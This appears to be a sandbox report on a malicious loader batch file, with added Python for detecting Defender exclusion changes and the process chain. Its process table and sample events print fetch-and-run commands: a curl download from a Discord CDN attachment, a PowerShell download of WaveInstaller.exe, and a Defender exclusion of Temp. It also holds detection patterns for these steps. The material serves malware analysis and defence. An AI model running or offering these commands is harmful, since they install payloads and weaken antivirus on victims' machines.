File name: wave-fixes.bat

Full analysis: https://app.any.run/tasks/3a0f2c03-c28d-4361-8e33-411aad971903
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 30, 2025, 02:56:59
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: loader, discord, payload
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5: CD6874847B186973474AE32AA1F9D2F0
SHA1: C0DE8A0753737B107027FFF2E53EEB51BCA52577
SHA256: 6A09D3DC13A6D819F4196AB7C197633AEDD970DF832BACC33DE33A3DDA894457
SSDEEP: 48:NK6S+DdkMRRtbqwgtctzns6ZI5RjjfsLSdfVZIJKKSQiF6oFERC:e+DHRrpga+6+PkyZI4KXiF6ZRC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes Windows Defender settings

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)
  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 7724)
      • cmd.exe (PID: 7660)
    • Starts process via Powershell

      • powershell.exe (PID: 7724)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 7724)
      • cmd.exe (PID: 7660)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 7976)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7976)
    • Discord domain found in command line (probably downloading payload)

      • curl.exe (PID: 7308)
    • The executable file from the user directory is run by the CMD process

      • WaveInstaller.exe (PID: 7268)
      • WaveInstaller.exe (PID: 4228)
      • WaveInstaller.exe (PID: 2384)
    • Reads security settings of Internet Explorer

      • WaveInstaller.exe (PID: 7268)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7280)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7660)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 7660)
  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 7976)
      • WaveInstaller.exe (PID: 7268)
      • slui.exe (PID: 8100)
    • Disables trace logs

      • powershell.exe (PID: 7976)
      • WaveInstaller.exe (PID: 7268)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7924)
      • powershell.exe (PID: 7280)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7924)
      • powershell.exe (PID: 7280)
    • Checks supported languages

      • curl.exe (PID: 7308)
      • WaveInstaller.exe (PID: 7268)
      • curl.exe (PID: 7324)
    • Reads the computer name

      • curl.exe (PID: 7308)
      • WaveInstaller.exe (PID: 7268)
      • curl.exe (PID: 7324)
    • Reads the machine GUID from the registry

      • WaveInstaller.exe (PID: 7268)
    • Execution of CURL command

      • cmd.exe (PID: 7660)
    • Reads the software policy settings

      • WaveInstaller.exe (PID: 7268)
      • slui.exe (PID: 8100)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
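The two MALICIOUS signatures above (Windows Defender settings changed, and a path added to the exclusion list by cmd.exe 7660 / powershell.exe 7724) leave a host-side trace that does not depend on the sandbox: Microsoft Defender writes Event ID 5007 to the Microsoft-Windows-Windows Defender/Operational log whenever its configuration changes, with the old and new registry value in the message text. The Python below is an added triage example, not ANY.RUN's code and not part of the batch file; it parses the "Old value:" / "New value:" lines of exported 5007 messages and rates exclusion changes by how easily a standard user could have abused them. The message layout is reproduced from memory of such events and every sample message is constructed; the excluded Temp directory is an assumption, since the report names the signature but not the excluded path.

```python
"""Triage Microsoft Defender Event ID 5007 messages for exclusion changes.

Added example; the event text below is constructed to follow the
"Old value: / New value:" layout of 5007 messages and should be checked
against your own exported events before use.
"""
import re
from dataclasses import dataclass

KEY = r"HKLM\SOFTWARE\Microsoft\Windows Defender"
HEADER = ("Microsoft Defender Antivirus Configuration has changed. If this is an unexpected "
          "event you should review the settings as this may be the result of malware.")


def msg(old: str, new: str) -> str:
    """Build one 5007-style message body (constructed sample data)."""
    return f"{HEADER}\n\tOld value: {old}\n\tNew value: {new}"


# Constructed samples. The Temp exclusion mirrors the report's
# "Adds path to the Windows Defender exclusion list" signature; the path itself is assumed.
SAMPLE_5007 = [
    msg("", KEY + r"\Exclusions\Paths\C:\Users\admin\AppData\Local\Temp = 0x0"),
    msg("", KEY + r"\Exclusions\Paths\D:\Builds\Cache = 0x0"),
    msg("", KEY + r"\Real-Time Protection\DisableRealtimeMonitoring = 0x1"),
    msg(KEY + r"\Exclusions\Paths\C:\Users\admin\AppData\Local\Temp = 0x0", ""),
]

# "<Old|New> value: <KEY>\<subkey...> = 0x<n>"; the key part is optional because a removal
# leaves "New value:" empty and an addition leaves "Old value:" empty.
VALUE_RE = re.compile(
    r"(?P<which>Old|New) value:\s*"
    r"(?:HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\(?P<sub>.+?)\s*=\s*(?P<val>0x[0-9A-Fa-f]+))?",
    re.IGNORECASE,
)
# Locations a standard user can write to: drive roots, profile directories, user env vars, UNC paths.
USER_WRITABLE_RE = re.compile(
    r"^(?:[a-z]:\\?$|[a-z]:\\users\\|%(?:temp|tmp|userprofile|appdata|localappdata|public)%|\\\\)",
    re.IGNORECASE,
)
EXCLUSION_KINDS = {"paths": "exclusion_path", "processes": "exclusion_process",
                   "extensions": "exclusion_extension"}


@dataclass
class Change:
    action: str   # "added" or "removed"
    kind: str     # exclusion_path / exclusion_process / exclusion_extension / setting_disabled / other
    target: str   # the excluded path, process or extension, or the setting's subkey
    risk: str     # high / medium / low / info


def classify(sub: str, val: str, action: str) -> Change:
    parts = sub.split("\\")
    if parts[0].lower() == "exclusions" and len(parts) >= 3 and parts[1].lower() in EXCLUSION_KINDS:
        kind = EXCLUSION_KINDS[parts[1].lower()]
        target = "\\".join(parts[2:])
        if action == "removed":
            risk = "info"
        elif kind != "exclusion_path" or USER_WRITABLE_RE.search(target):
            # process/extension exclusions are broad; a user-writable path is exactly what a loader wants
            risk = "high"
        else:
            risk = "medium"
        return Change(action, kind, target, risk)
    if parts[-1].lower().startswith("disable") and int(val, 16) != 0:
        return Change(action, "setting_disabled", sub, "high")
    return Change(action, "other", sub, "low")


def parse_5007(message: str):
    """Return the Change described by one 5007 message, or None if it carries no key/value lines."""
    values = {}
    for m in VALUE_RE.finditer(message):
        values[m.group("which").lower()] = (m.group("sub"), m.group("val")) if m.group("sub") else None
    if values.get("new"):
        sub, val = values["new"]
        return classify(sub, val, "added")
    if values.get("old"):
        sub, val = values["old"]
        return classify(sub, val, "removed")
    return None


def triage(messages):
    """Parse every message and keep the ones that describe a configuration change."""
    return [c for c in (parse_5007(m) for m in messages) if c is not None]


if __name__ == "__main__":
    for c in triage(SAMPLE_5007):
        print(f"{c.risk:6} {c.action:7} {c.kind:20} {c.target}")
```

On a live host the same check is a one-liner against the current state (Get-MpPreference and its ExclusionPath property), but the 5007 events are what tell you when the exclusion appeared and whether it was later removed to cover tracks, which is why the parser keeps the "removed" case as an informational finding.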
No Malware configuration.
All screenshots are available in the full report
Total processes: 140
Monitored processes: 15
Malicious processes: 2
Suspicious processes: 1

Behavior graph

Process nodes in the order the graph lists them (nodes the report marks "no specs" are shown as such): start, cmd.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), powershell.exe, conhost.exe (no specs), powershell.exe, waveinstaller.exe (no specs), waveinstaller.exe (no specs), waveinstaller.exe, curl.exe, powershell.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), curl.exe, slui.exe

Process information

Each entry gives the PID, command line (CMD), image path and parent process, followed by the process properties the sandbox recorded and the loaded modules.
PID 2148
CMD: cmd /c "cd VisualC++ && call install_all.bat"
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID 2384
CMD: "C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe"
Path: C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe
Parent process: cmd.exe
User: admin
Integrity Level: MEDIUM
Description: WaveInstaller
Exit code: 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED: the image asks for elevation and was started without it)
Version: 1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID 4228
CMD: "C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe"
Path: C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe
Parent process: cmd.exe
User: admin
Integrity Level: MEDIUM
Description: WaveInstaller
Exit code: 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED, as for PID 2384)
Version: 1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID 5248
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 7268
CMD: "C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe"
Path: C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe
Parent process: cmd.exe
User: admin
Integrity Level: HIGH (the only WaveInstaller.exe run that did not end with STATUS_ELEVATION_REQUIRED; this is the instance that performed the network and registry activity listed below)
Description: WaveInstaller
Exit code: 1
Version: 1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID 7280
CMD: powershell Expand-Archive -Path Visual-C-Runtimes-All-in-One-May-2024.zip -DestinationPath VisualC++
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID 7308
CMD: curl -o Visual-C-Runtimes-All-in-One-May-2024.zip "https://cdn.discordapp.com/attachments/801960895658983429/1262309228140433408/Visual-C-Runtimes-All-in-One-May-2024.zip?ex=66962094&is=6694cf14&hm=2fd48ea988a8d1cf9d388adcc897b8f3ccd74481aabb52d72d52476fdc9adeec&"
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User: admin
Company: curl, https://curl.se/
Integrity Level: MEDIUM
Description: The curl executable
Exit code: 0 (curl without -f/--fail returns 0 even when the server answers with an HTTP error status, so this alone does not show that the archive was received)
Version: 8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID 7324
CMD: curl -o node-v20.15.0-x64.msi "https://nodejs.org/dist/v20.15.0/node-v20.15.0-x64.msi"
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User: admin
Company: curl, https://curl.se/
Integrity Level: MEDIUM
Description: The curl executable
Exit code: 0
Version: 8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID 7660
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\wave-fixes.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID 7668
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
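The process table above records the chain in order: explorer.exe starts cmd.exe (7660) on the Desktop batch file; that cmd.exe runs curl.exe against the Discord CDN (7308) and nodejs.org (7324), powershell.exe for Expand-Archive (7280), a nested cmd.exe for install_all.bat (2148), and then WaveInstaller.exe from Temp three times, twice at MEDIUM integrity ending in 0xC000042C and once at HIGH. The Python below is an added example, not ANY.RUN's code and not the batch file, that correlates process-creation events of this shape into findings and a verdict. The event records are constructed from the command lines the report shows; the Sysmon-style field names, the parent PIDs (including the placeholder explorer.exe PIDs), the Add-MpPreference command line for PID 7724 and the Invoke-WebRequest command line for PID 7976 are assumptions, because the report lists those two PowerShell instances only by signature.

```python
"""Correlate process-creation events into the loader chain shown in this report.

Added example. Events are constructed from the report's command lines; the
command lines of PIDs 7724 and 7976, and all parent PIDs, are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

STATUS_ELEVATION_REQUIRED = 0xC000042C  # decimal 3221226540, the exit code of PIDs 2384 and 4228


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    command_line: str
    integrity: str = "Medium"
    exit_code: Optional[int] = None  # from the matching process-exit record, if any


@dataclass
class Finding:
    pid: int
    tag: str
    detail: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WAVE = r"C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe"

SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),  # placeholder PIDs
    ProcEvent(7660, 1000, r"C:\Windows\System32\cmd.exe",
              r'C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\wave-fixes.bat" "'),
    # assumed command line: the report gives only the exclusion signature for 7724
    ProcEvent(7724, 7660, PS,
              r'powershell -Command "Add-MpPreference -ExclusionPath C:\Users\admin\AppData\Local\Temp"'),
    ProcEvent(7308, 7660, r"C:\Windows\System32\curl.exe",
              'curl -o Visual-C-Runtimes-All-in-One-May-2024.zip "https://cdn.discordapp.com/attachments/'
              '801960895658983429/1262309228140433408/Visual-C-Runtimes-All-in-One-May-2024.zip'
              '?ex=66962094&is=6694cf14&hm=2fd48ea988a8d1cf9d388adcc897b8f3ccd74481aabb52d72d52476fdc9adeec&"',
              exit_code=0),
    ProcEvent(7324, 7660, r"C:\Windows\System32\curl.exe",
              'curl -o node-v20.15.0-x64.msi "https://nodejs.org/dist/v20.15.0/node-v20.15.0-x64.msi"',
              exit_code=0),
    ProcEvent(7280, 7660, PS,
              "powershell Expand-Archive -Path Visual-C-Runtimes-All-in-One-May-2024.zip -DestinationPath VisualC++",
              exit_code=1),
    ProcEvent(2148, 7660, r"C:\Windows\System32\cmd.exe",
              'cmd /c "cd VisualC++ && call install_all.bat"', exit_code=1),
    # assumed command line: the report shows only that 7976 fetched an executable from cdn.getwave.gg into Temp
    ProcEvent(7976, 7660, PS,
              r'powershell -Command "Invoke-WebRequest https://cdn.getwave.gg/WaveInstaller.exe -OutFile $env:TEMP\WaveInstaller.exe"'),
    ProcEvent(2384, 7660, WAVE, f'"{WAVE}"', exit_code=STATUS_ELEVATION_REQUIRED),
    ProcEvent(4228, 7660, WAVE, f'"{WAVE}"', exit_code=STATUS_ELEVATION_REQUIRED),
    ProcEvent(7268, 7660, WAVE, f'"{WAVE}"', integrity="High", exit_code=1),
]

BATCH_FROM_SHELL_RE = re.compile(r'cmd(?:\.exe)?\s+/[ck]\s+"*[^"]*\.bat\b', re.IGNORECASE)
DISCORD_CDN_RE = re.compile(r"https?://(?:cdn|media)\.discordapp\.com/", re.IGNORECASE)
DEFENDER_EXCLUSION_RE = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.IGNORECASE)
PS_DOWNLOAD_RE = re.compile(
    r"(?:Invoke-WebRequest|iwr|wget|curl|DownloadFile|DownloadString|Start-BitsTransfer)\b.*\s-(?:OutFile|Destination)\b",
    re.IGNORECASE)
USER_WRITABLE_IMAGE_RE = re.compile(
    r"\\Users\\[^\\]+\\(?:AppData\\Local\\Temp|AppData\\Roaming|Downloads|Desktop)\\", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events: list[ProcEvent]) -> list[Finding]:
    by_pid = {e.pid: e for e in events}
    findings: list[Finding] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        img = basename(e.image)
        if img == "cmd.exe" and pimg == "explorer.exe" and BATCH_FROM_SHELL_RE.search(e.command_line):
            findings.append(Finding(e.pid, "batch_from_explorer", "user launched a .bat file from the shell"))
        if img == "curl.exe" and DISCORD_CDN_RE.search(e.command_line):
            findings.append(Finding(e.pid, "discord_cdn_download", "payload hosted on the Discord CDN"))
        if img == "powershell.exe" and DEFENDER_EXCLUSION_RE.search(e.command_line):
            findings.append(Finding(e.pid, "defender_exclusion", "Defender exclusion added from a script"))
        if img == "powershell.exe" and PS_DOWNLOAD_RE.search(e.command_line):
            findings.append(Finding(e.pid, "powershell_download", "PowerShell wrote a downloaded file to disk"))
        if pimg == "cmd.exe" and USER_WRITABLE_IMAGE_RE.search(e.image):
            findings.append(Finding(e.pid, "user_dir_exe_from_cmd", f"{img} started from a user-writable directory"))
    # Elevation retry: an image that failed with STATUS_ELEVATION_REQUIRED and later ran at High integrity.
    by_image: dict[str, list[ProcEvent]] = {}
    for e in events:
        by_image.setdefault(e.image.lower(), []).append(e)
    for runs in by_image.values():
        if any(r.exit_code == STATUS_ELEVATION_REQUIRED for r in runs):
            for r in runs:
                if r.integrity.lower() == "high":
                    findings.append(Finding(r.pid, "elevation_retry", "re-launched elevated after 0xC000042C"))
    return findings


def verdict(findings: list[Finding]) -> str:
    """Malicious only when the three legs of the chain are all present: exclusion, download, execution."""
    tags = {f.tag for f in findings}
    downloads = {"discord_cdn_download", "powershell_download"}
    if "defender_exclusion" in tags and "user_dir_exe_from_cmd" in tags and tags & downloads:
        return "malicious"
    return "suspicious" if tags else "clean"


if __name__ == "__main__":
    fs = analyse(SAMPLE_EVENTS)
    for f in fs:
        print(f"{f.pid:5} {f.tag:22} {f.detail}")
    print("verdict:", verdict(fs))
```

The nodejs.org download (7324) deliberately produces no finding: a benign-looking MSI fetched over curl is exactly the cover such "fix" scripts use, and it is the combination of the exclusion, the CDN-hosted archive, and the Temp executable retried until it runs elevated that makes the chain, not any one download.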
Total events: 28 219
Read events: 28 205
Write events: 14
Delete events: 0

Modification events

All ten recorded registry writes come from WaveInstaller.exe (PID 7268) and set RAS API tracing values under HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing (the "Disables trace logs" signature above).

...\Tracing\WaveInstaller_RASAPI32:
  EnableFileTracing = 0
  EnableAutoFileTracing = 0
  EnableConsoleTracing = 0
  FileTracingMask = (value not shown in the report)
  ConsoleTracingMask = (value not shown in the report)
  MaxFileSize = 1048576
  FileDirectory = %windir%\tracing

...\Tracing\WaveInstaller_RASMANCS:
  EnableFileTracing = 0
  EnableAutoFileTracing = 0
  EnableConsoleTracing = 0
Executable files: 1
Suspicious files: 4
Text files: 8
Unknown types: 0

Dropped files

The __PSScriptPolicyTest_*.ps1/.psm1 files are PowerShell's own probes for script-execution policy (AppLocker/WDAC), which is why every instance has the same hash; the CustomDestinations entries are Explorer jump-list artifacts. The one executable dropped is WaveInstaller.exe, written to Temp by powershell.exe (PID 7976).

7924 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h534h2pe.bk0.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xl5nl5dr.nyd.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7724 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ntza0ugf.gte.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7724 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f2kfdk03.oru.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7976 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jdf23drl.y0g.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7280 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fnacwggh.n03.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7976 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sdzbxcal.ms2.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FAY4UMTOIB7HFZ5PJICI.temp | binary
  MD5: A62D4FBABC5359D703403E8551C03F15
  SHA256: 772CD56B7BF9928F14771985CC9E0272C0C0792354A6E78CD14C6E5C346BD673
7976 powershell.exe | C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe | executable
  MD5: 215D509BC217F7878270C161763B471E
  SHA256: 984DFC64C10F96C5350D6D9216A5D7ABFECE1658DFC93925F7A6B0C80817C886
7924 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary
  MD5: A62D4FBABC5359D703403E8551C03F15
  SHA256: 772CD56B7BF9928F14771985CC9E0272C0C0792354A6E78CD14C6E5C346BD673
HTTP(S) requests: 23
TCP/UDP connections: 48
DNS requests: 19
Threats: 5

HTTP requests

Columns: PID/process | method | HTTP code | IP:port | URL | type | size | reputation. A dash marks a field the report leaves empty; the CN column is "unknown" for every row and is omitted. Rows without a PID are those the report does not attribute to a process.

- | GET | 302 | 172.183.192.203:443 | https://www.nuget.org/api/v2/package/chromiumembeddedframework.runtime.win-x86/124.3.8 | html | 232 b | whitelisted
- | GET | 200 | 4.175.87.197:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | compressed | 23.9 Kb | whitelisted
- | GET | - | 2.16.183.203:443 | https://globalcdn.nuget.org/packages/chromiumembeddedframework.runtime.win-x86.124.3.8.nupkg?packageVersion=124.3.8 | - | - | -
7684 SIHClient.exe | GET | 200 | 2.16.164.24:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | - | - | whitelisted
7684 SIHClient.exe | GET | 200 | 2.16.164.24:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | - | - | whitelisted
- | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | xml | 512 b | whitelisted
7684 SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | - | - | whitelisted
- | GET | 200 | 20.242.39.171:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | - | - | -
7684 SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | - | - | whitelisted
7684 SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl | - | - | whitelisted

Connections

Columns: PID/process | IP:port | domain | ASN | CN | reputation. A dash marks a field the report leaves empty.

- | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 System | 192.168.100.255:137 | - | - | - | whitelisted
4 System | 192.168.100.255:138 | - | - | - | whitelisted
3216 svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
7976 powershell.exe | 104.26.5.10:443 | cdn.getwave.gg | CLOUDFLARENET | US | unknown
7308 curl.exe | 162.159.130.233:443 | cdn.discordapp.com | CLOUDFLARENET | - | whitelisted
7324 curl.exe | 104.20.23.46:443 | nodejs.org | CLOUDFLARENET | - | shared
7684 SIHClient.exe | 4.175.87.197:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7268 WaveInstaller.exe | 172.183.192.203:443 | www.nuget.org | MICROSOFT-CORP-MSN-AS-BLOCK | DE | whitelisted
7268 WaveInstaller.exe | 2.19.126.162:443 | globalcdn.nuget.org | Akamai International B.V. | DE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
google.com
  • 142.250.185.142
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
cdn.getwave.gg
  • 104.26.5.10
  • 172.67.73.39
  • 104.26.4.10
unknown
cdn.discordapp.com
  • 162.159.130.233
  • 162.159.133.233
  • 162.159.134.233
  • 162.159.135.233
  • 162.159.129.233
whitelisted
nodejs.org
  • 104.20.23.46
  • 104.20.22.46
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
www.nuget.org
  • 172.183.192.203
whitelisted
globalcdn.nuget.org
  • 2.19.126.162
  • 2.19.126.132
whitelisted
crl.microsoft.com
  • 2.16.164.24
  • 2.16.164.106
  • 2.16.164.9
  • 2.16.164.18
  • 2.16.164.99
whitelisted

Threats

Columns: PID/process | class | message. Rows without a PID are those the report does not attribute to a process.

- | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
- | Misc activity | ET INFO Request for EXE via Powershell
- | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
2196 svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)
7308 curl.exe | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI)